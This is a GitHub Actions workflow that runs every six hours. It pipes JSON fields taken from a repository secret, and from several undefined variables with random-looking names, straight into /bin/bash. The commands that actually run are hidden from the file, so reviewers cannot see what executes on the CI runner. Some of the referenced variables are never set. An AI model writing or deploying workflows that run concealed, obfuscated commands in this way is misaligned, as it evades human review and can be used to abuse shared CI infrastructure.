name: penchunfenyou

on:
  workflow_dispatch:
  schedule:
    - cron: '29 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: penchunfenyou
        env:
          vy68321: ${{ secrets.vy68321 }}
        run: |
          echo $vy68321 | jq -r .tds28 | /bin/bash
          echo $rxivq917 | jq -r .rr00093 | /bin/bash
          echo $sw50283 | jq -r .too192 | /bin/bash
          echo $cy13 | jq -r .mdlb9036 | /bin/bash
          echo $l2674 | jq -r .nut07 | /bin/bash

